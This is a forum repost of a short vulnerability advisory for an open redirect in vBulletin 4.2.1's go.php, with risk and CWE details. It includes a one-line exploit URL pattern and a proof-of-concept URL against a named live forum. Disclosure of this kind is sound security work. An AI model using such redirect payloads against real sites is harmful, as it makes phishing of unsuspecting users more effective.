Jump to content
akkiliON

vBulletin 4.2.1 Open Redirect

Recommended Posts

  • Active Members
Posted

# URL Open Redirect on vBulletin

# Risk: Low

# CWE number: CWE-601

# Version: 4.2.1

# Date: 29/10/2014

# Author: Felipe " Renzi " Gabriel

# Contact: renzi@linuxmail.org

# Tested on Windows 8 pro

# Vulnerable File: go.php

# Exploit:

[+] http://host.com/go.php?url=http://site.com

# PoC:
[+] http://vb.bdr1.net/go.php?url=http://www.google.com

Wait 30 seconds, and you will be redirect...

# Note: Open redirect (CWE-601) allows phishing attack to be more effective.
Redirection is commonly used within all web applications for various
purposes.("Jason Lam" ~ Top 25 Series - Rank 23 - Open Redirect)

# Reference: http://software-security.sans.org

# Thank's

Source: vBulletin 4.2.1 Open Redirect ? Packet Storm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...